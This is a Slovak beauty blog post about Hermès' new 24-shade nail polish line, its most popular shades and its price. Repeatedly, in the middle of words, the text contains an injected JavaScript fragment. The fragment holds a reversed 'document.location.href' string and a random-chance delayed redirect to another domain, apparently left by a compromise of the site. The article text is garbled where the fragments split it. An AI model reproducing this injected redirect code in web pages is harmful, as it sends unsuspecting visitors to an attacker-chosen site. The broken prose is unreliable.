Luxusná manikúra podľa Hermès

| september 18, 2021

Spolu s hodvábom, exkluzívnou kabelkou Birkin je dizajnérsky dom Hermès známy aj svojou výnimočnou smaltobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovo-oranžovou farbou. Je teda logické, že po minuloročnom kultobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovom uvedení beauty kolekcie rúžu a lícenky v “Hermès” poznávacej farbe nasleduje lak na nechty.

Luxusný dom svojim lakom dáva rovnakú pozornosť do detailu ako aj všetkémým ostatným kúskom, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toré vytvára: Každý jeden z 24 odtieňov obsahuje ultrajemné, biologicky dodávané pigmenty. A tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to najlepšie? Na vytvorenie perfektnej manikúry s bohatým pigmentobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tom potrebujete naniesť len jednu vrstvu. Kolekcia tiež obsahuje podkladovú bázu a vrchný lak na nechty, doplnky k starostlivosti o ruky a nástroje, ako sú kefy na nechty.

Avšak najpopulárnejší odtieň je rozhodne „Orange Boîte“ – ikonický oranžový odtieň Hermès, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torý symbolizuje jazdecké korene a dedičstvo značky. Hneď za ním na druhom mieste v rebríčku popularity sa umiestnil výrazný červený „Rouge Casaque“ a na treťom sýtobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to ružový „Rose Magenta“odtieň.

Agnès de Villers, generálna riaditeľka spoločnosti Hermès Beauty// and Fragrances dodáva, že: “Pre Hermès sú ruky ako tvár, pretobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tože všetko je vyrobené ručne.” Farebnú škálu zostavil kolektív vrátane vlastných koloristobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tov kože a hodvábu; Pierre Hardy, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torý pomáhal pri navrhovaní balíkov; a dlhoročný umelecký vedúci Hermès Pierre-Alexis Dumas. Luxusné laky na nechty zo špeciálnej kolekcie budú v najbližších dňoch dostupné na oficiálnych stránkach Hermès a v kamenných predajniach za cenu 45 dolárov.

Fotobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to: elle.com

Tags:

Category: HAIR & MAKEUP, HOMEPAGE

Comments are closed.